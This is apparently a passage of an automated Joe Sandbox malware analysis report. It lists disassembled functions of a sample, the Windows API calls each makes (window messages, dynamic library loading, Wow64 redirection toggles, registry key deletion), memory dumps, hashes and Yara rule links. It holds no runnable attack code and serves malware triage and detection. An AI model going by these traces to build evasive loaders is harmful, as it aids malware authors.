                                                                  • Opcode ID: 1cfb353e961d773840b2f4ea36344eb4a9b8f27f902403bca0f874cb51f54fe0
                                                                  • Instruction ID: f9dc0376a0cb949840f4595029085022f6e4f1153cebf498ea44caca826194c2
                                                                  • Opcode Fuzzy Hash: 1cfb353e961d773840b2f4ea36344eb4a9b8f27f902403bca0f874cb51f54fe0
                                                                  • Instruction Fuzzy Hash: BD219F32510618ABDF128F98CC46FEA3B79EF48714F110214FB556B1D0D6B5AC55CB90
                                                                  Function 003BA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003BA941
                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003BA94F
                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003BA956
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$DestroyWindow
                                                                  • String ID: msctls_updown32
                                                                  • API String ID: 4014797782-2298589950
                                                                  • Opcode ID: 47e91c0fbf2d988e46e6a94026f686c2eac49a0c701df1dbbe92e15756b48b30
                                                                  • Instruction ID: f6c2c0d19dc21be03a47b86c79e05c5d52d39771390f6a9aaeca3a1d565d046c
                                                                  • Opcode Fuzzy Hash: 47e91c0fbf2d988e46e6a94026f686c2eac49a0c701df1dbbe92e15756b48b30
                                                                  • Instruction Fuzzy Hash: B121A1B5600609AFDB12DF18DC81DBB37ADEF5A3A8B054059FB049B261CB31EC11DB61
                                                                  Function 003B99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003B9A30
                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003B9A40
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003B9A65
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$MoveWindow
                                                                  • String ID: Listbox
                                                                  • API String ID: 3315199576-2633736733
                                                                  • Opcode ID: f7358f7cf6de47ee2d193da03759996c03a471e4ef5738f1b498daeccd4690ba
                                                                  • Instruction ID: c3f1c82a65004d4fd592d0baadc96fd606462cce46f8525b6982f221a606867d
                                                                  • Opcode Fuzzy Hash: f7358f7cf6de47ee2d193da03759996c03a471e4ef5738f1b498daeccd4690ba
                                                                  • Instruction Fuzzy Hash: 1821B032610118BFDB228F54DC85FFB3BAEEF89754F02812AFB549B1A0C6719C1187A0
                                                                  Function 003BA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003BA46D
                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003BA482
                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003BA48F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: msctls_trackbar32
                                                                  • API String ID: 3850602802-1010561917
                                                                  • Opcode ID: 450d9ef1a1afe8ebcc617f00746e84c7614f159dd37823461e093973fa1b3c15
                                                                  • Instruction ID: 8193c3e3b39e7b27f818b0a2c6836de9f9e334ab8c687cd550fc989e5b354b68
                                                                  • Opcode Fuzzy Hash: 450d9ef1a1afe8ebcc617f00746e84c7614f159dd37823461e093973fa1b3c15
                                                                  • Instruction Fuzzy Hash: E5110A71240608BEEF215F65CC4AFEB3B6DEF89758F024528FB45A61D1D6B2E811C724
                                                                  Function 00372287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00372350,?), ref: 003722A1
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 003722A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RoInitialize$combase.dll
                                                                  • API String ID: 2574300362-340411864
                                                                  • Opcode ID: 3f5a4e896115aef41d5866d855e85ee4f23f7ea57499bb304a869b607d00027a
                                                                  • Instruction ID: 29bd48cda49b8d51c6df145dd85a3676db25ae271a2fb54c1fb8cafd665fde04
                                                                  • Opcode Fuzzy Hash: 3f5a4e896115aef41d5866d855e85ee4f23f7ea57499bb304a869b607d00027a
                                                                  • Instruction Fuzzy Hash: DAE01A70A94305ABDB625F71EE49B953668AB00716F10C431F182E91A0DBFA8080CF08
                                                                  Function 0037235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00372276), ref: 00372376
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0037237D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RoUninitialize$combase.dll
                                                                  • API String ID: 2574300362-2819208100
                                                                  • Opcode ID: d657863c2e3fce8dd86ff0fd5384bebf55b67ba875fbe9bd40a1773270df41df
                                                                  • Instruction ID: a1e2b6bcd2c6427932382067df7cbe104cc042d36b9affce5e489f24e19dc36b
                                                                  • Opcode Fuzzy Hash: d657863c2e3fce8dd86ff0fd5384bebf55b67ba875fbe9bd40a1773270df41df
                                                                  • Instruction Fuzzy Hash: E7E0B674585304ABEB225F61FD0DB953A68B700706F118435F14AE21B0CBFE54908A18
                                                                  Function 003CAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LocalTime__swprintf
                                                                  • String ID: %.3d$WIN_XPe
                                                                  • API String ID: 2070861257-2409531811
                                                                  • Opcode ID: 13437bb0978f712930f6621ebbe2afdf8eb2c996afe52fe765df36635ed69e1e
                                                                  • Instruction ID: b2b8ea4983bd07e9bbfcde61bd54d1047087df9f6a200ed3e059696dea0a0258
                                                                  • Opcode Fuzzy Hash: 13437bb0978f712930f6621ebbe2afdf8eb2c996afe52fe765df36635ed69e1e
                                                                  • Instruction Fuzzy Hash: 1BE0ECB2804A1C9BCA129750DD05EF973BCA708745F148496B906E1804D7359F84AB12
                                                                  Function 003B2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,003B21FB,?,003B23EF), ref: 003B2213
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 003B2225
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetProcessId$kernel32.dll
                                                                  • API String ID: 2574300362-399901964
                                                                  • Opcode ID: 541f9a73e55a2b85a42463aba4ad03c9d00a34a478948d4ea4d9e631d506dc55
                                                                  • Instruction ID: fff90c0d8caad8a75f3ffd625b66b544f33d68b2635703523c6b9038cd1ed503
                                                                  • Opcode Fuzzy Hash: 541f9a73e55a2b85a42463aba4ad03c9d00a34a478948d4ea4d9e631d506dc55
                                                                  • Instruction Fuzzy Hash: BDD0A774840717AFC7634F30FC0874277D8EB04308F11482BE952F25D0D7B4D8808650
                                                                  Function 003542F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003542EC,?,003542AA,?), ref: 00354304
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00354316
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-1355242751
                                                                  • Opcode ID: 1b06cf250b02aed25b42f2625bd8811f89fb88ffa3820d8be8c22dad08d5454b
                                                                  • Instruction ID: db7529d8e019aea936e4745b19e56507c2c6c49164bd17432f77801f23752188
                                                                  • Opcode Fuzzy Hash: 1b06cf250b02aed25b42f2625bd8811f89fb88ffa3820d8be8c22dad08d5454b
                                                                  • Instruction Fuzzy Hash: AAD05E74440712AEC7264F20E80CA0177D8EB04306F11442BA852E21B4D7B4C8848650
                                                                  Function 0035434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,003541BB,00354341,?,0035422F,?,003541BB,?,?,?,?,003539FE,?,00000001), ref: 00354359
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0035436B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-3689287502
                                                                  • Opcode ID: 3f6d9d332faf6c8a394e8a5aa8e138e3ae86b413f97d39f610e4514d96eb0ffc
                                                                  • Instruction ID: 646d621fb7c566342b45b77080cb5ff8a7e2c4d280a84f58d7774a2957b892a8
                                                                  • Opcode Fuzzy Hash: 3f6d9d332faf6c8a394e8a5aa8e138e3ae86b413f97d39f610e4514d96eb0ffc
                                                                  • Instruction Fuzzy Hash: FFD05E74440712AECB264F30E808A0177D8AB1071AF11442BE892E21A0D7B4D8848A50
                                                                  Function 00390539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,0039051D,?,003905FE), ref: 00390547
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00390559
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                  • API String ID: 2574300362-1071820185
                                                                  • Opcode ID: 9e38cc41979cd4d7c748dbb395754af3f4bf36ab5613707dee98e5ef620fcb49
                                                                  • Instruction ID: 5f8308da9317f5ab559b561f05f73d05cb7802a3009174eedb800dd5442b8f68
                                                                  • Opcode Fuzzy Hash: 9e38cc41979cd4d7c748dbb395754af3f4bf36ab5613707dee98e5ef620fcb49
                                                                  • Instruction Fuzzy Hash: C0D05E704447239ECB229B20A80860677A8AB01341F22842BE456A21D0DAB4C880CA10
                                                                  Function 00390564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0039052F,?,003906D7), ref: 00390572
                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00390584
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                  • API String ID: 2574300362-1587604923
                                                                  • Opcode ID: 01e03741c6e2fca7897f439cb4de489f7e2d8afa7dab7ed3c62f444bbb43d2cb
                                                                  • Instruction ID: 4ae81898731f52f8c31223989bb3c7736691c3f9e83327bd79444cf8c043faf8
                                                                  • Opcode Fuzzy Hash: 01e03741c6e2fca7897f439cb4de489f7e2d8afa7dab7ed3c62f444bbb43d2cb
                                                                  • Instruction Fuzzy Hash: B0D05E704043139FCB225F20A848B0277E8AB05300F22842BEC52A2190DAB4C4808A20
                                                                  Function 003AECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,003AECBE,?,003AEBBB), ref: 003AECD6
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003AECE8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                  • API String ID: 2574300362-1816364905
                                                                  • Opcode ID: 48566d77156d783a29327a1d60250a63ce7283dda74f67289930993944588735
                                                                  • Instruction ID: 4fdbe620398ce5d076fb26fcfae5635e274a719128dd227224f47795f1e2e1e3
                                                                  • Opcode Fuzzy Hash: 48566d77156d783a29327a1d60250a63ce7283dda74f67289930993944588735
                                                                  • Instruction Fuzzy Hash: AFD0A770440723AFCB225F60FC4870277E8EB01310F11842BF856E31D0DBB4C8808750
                                                                  Function 003ABADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003ABAD3,00000001,003AB6EE,?,003EDC00), ref: 003ABAEB
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003ABAFD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                  • API String ID: 2574300362-199464113
                                                                  • Opcode ID: 9d70ee7acfe152c3ec7925d7f5212173a4c4025b6b50155747b3ddbfa7bab0c6
                                                                  • Instruction ID: 8e38ccb43e75f1b39350b683ef65601b06851e33febbe5cc434ac60c0293118d
                                                                  • Opcode Fuzzy Hash: 9d70ee7acfe152c3ec7925d7f5212173a4c4025b6b50155747b3ddbfa7bab0c6
                                                                  • Instruction Fuzzy Hash: 73D05E708447129EC7325F20F848B12B7D8EB01300F11443BA853A2190D7B4C880C664
                                                                  Function 003B3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,003B3BD1,?,003B3E06), ref: 003B3BE9
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003B3BFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 2574300362-4033151799
                                                                  • Opcode ID: 4f684d90413a7de21b7048d8de69693cb5bb1a7e43820c542553d294516ba6c9
                                                                  • Instruction ID: 8a4a5d5bca783fd5569dc0aaa2887a1671bc0f8878db140dd3f11f268e4f6f24
                                                                  • Opcode Fuzzy Hash: 4f684d90413a7de21b7048d8de69693cb5bb1a7e43820c542553d294516ba6c9
                                                                  • Instruction Fuzzy Hash: 9CD05EB04407229AC7215BA0A808682BFA8AB01318F21482BE556A2590E6B8C8808E10
                                                                  Function 00389B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e3c2afc8c0fd03b6041ea7f2a33fd18930840587b28c78c416cc0f3d7f8fe29
                                                                  • Instruction ID: b355feea3091c391ad0749a6b0c420f0be1a27ef59efa65ea326a3614873dc6a
                                                                  • Opcode Fuzzy Hash: 6e3c2afc8c0fd03b6041ea7f2a33fd18930840587b28c78c416cc0f3d7f8fe29
                                                                  • Instruction Fuzzy Hash: 85C15C75A00219EFCB16EF94C884BBEB7B9FF48700F1545DAE805AB251D730AE41CB90
                                                                  Function 003AAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 003AAAB4
                                                                  • CoUninitialize.OLE32 ref: 003AAABF
                                                                    • Part of subcall function 00390213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039027B
                                                                  • VariantInit.OLEAUT32(?), ref: 003AAACA
                                                                  • VariantClear.OLEAUT32(?), ref: 003AAD9D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
